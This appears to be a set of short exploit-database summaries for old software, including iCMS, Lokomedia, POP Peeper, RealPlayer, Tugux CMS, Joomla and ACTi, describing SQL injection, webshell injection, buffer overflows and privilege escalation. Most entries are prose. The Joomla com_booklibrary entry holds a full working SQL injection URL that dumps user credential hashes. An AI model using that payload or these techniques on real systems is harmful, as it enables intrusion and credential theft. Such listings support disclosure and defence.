This exploit is used to gain access to the iCMS v1.1 Admin panel by either exploiting an SQL injection vulnerability or by brute-forcing the admin password. The exploit requires knowledge of the web path and file privileges; a proof of concept is nevertheless provided. The exploit injects a webshell into the content.php page and then executes commands.
A Local File Download (LFD) vulnerability exists in CMS Lokomedia, which allows an attacker to download any file from the server. This vulnerability is due to insufficient sanitization of user-supplied input in the 'file' parameter of the 'downlot.php' script. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable script with a specially crafted 'file' parameter. This will allow the attacker to download any file from the server.
The POP Peeper 3.7 SEH exploit targets a buffer overflow vulnerability that allows an attacker to execute arbitrary code on the vulnerable system. The vulnerability exists in the POP Peeper 3.7.0.0 application, which is a Windows-based email client. The vulnerability is triggered when a specially crafted .ini file is opened by the application. The file contains a malicious payload that overwrites the SEH handler and executes the attacker's code.
This module exploits an initialization flaw within RealPlayer 11/11.1 and RealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object initialization failure. However, this failure is improperly handled and uninitialized memory is executed.
Tugux CMS 1.0_final is affected by multiple vulnerabilities, including SQL injection and a flaw in create_admin_parse.php which can be used to add Super Admin accounts without any authentication. The exploit is written in Perl.
This PoC crashes the Fake Webcam v.6.1 process by creating a file with 1000 'A' characters and writing it to the path 'c:a.wmv'.
There is a SQL Injection in com_booklibrary for Joomla 1.5. Tested on a fresh install, the author confirmed that a patch is available. PoC (show the hash of the table jos_users): http://xxx.xxx.xxx.xxx/index.php?searchtext=%'%20OR%20LOWER(b.bookid)%20LIKE%20'%a%'%20OR%20LOWER(b.isbn)%20LIKE%20'%a%'%20OR%20LOWER(b.title)%20LIKE%20'%a%'%20OR%20LOWER(b.manufacturer)%20LIKE%20'%a%'%20OR%20LOWER(b.comment)%20LIKE%20'%a%')%20AND%20b.published='1'%20AND%20b.approved='1'%20AND%20b.archived='0'%20UNION%20SELECT%201,2,username,email,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20FROM%20jos_users%20UNION%20SELECT%20b.*,%20blr2.rating2,%20c.title%20AS%20category_titel,c.id%20AS%20catid,%20c.ordering%20AS%20category_ordering%20FROM%20jos_booklibrary%20AS%20b%20LEFT%20JOIN%20jos_booklibrary_categories%20AS%20bc%20ON%20bc.bookid%20=%20b.id%20LEFT%20JOIN%20jos_categories%20AS%20c%20ON%20bc.catid%20=%20c.id%20LEFT%20JOIN%20(%20SELECT%20ROUND(avg(blr1.rating))%20AS%20rating2,%20fk_bookid%20FROM%20jos_booklibrary%20AS%20bl%20LEFT%20JOIN%20jos_booklibrary_review%20AS%20blr1%20ON%20blr1.fk_bookid%20=%20bl.id%20GROUP%20BY%20blr1.fk_bookid%20)%20blr2%20ON%20blr2.fk_bookid%20=%20b.id%20WHERE%20(LOWER(b.authors)%20LIKE%20'%&catid=0&option=com_booklibrary&task=search&Itemid=53&author=true&title=true&isbn=true&description=true&publisher=true&bookid=true
ACTi Corporation is the technology leader in IP surveillance, focusing on multiple security surveillance market segments. This exploit allows an attacker to execute arbitrary commands on the vulnerable system with root privileges. The exploit is triggered by sending a specially crafted HTTP request to the vulnerable system.
Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit these issues.
The package suffers from an elevation of privileges vulnerability which can be exploited by a simple user who can replace the executable file with a binary of choice. The vulnerability exists due to improper permissions, with the 'C' flag (Change (write)) for the 'Everyone' group, on the binary file msscasi_asp.exe and the package itself, msscasi_asp_pkg.exe.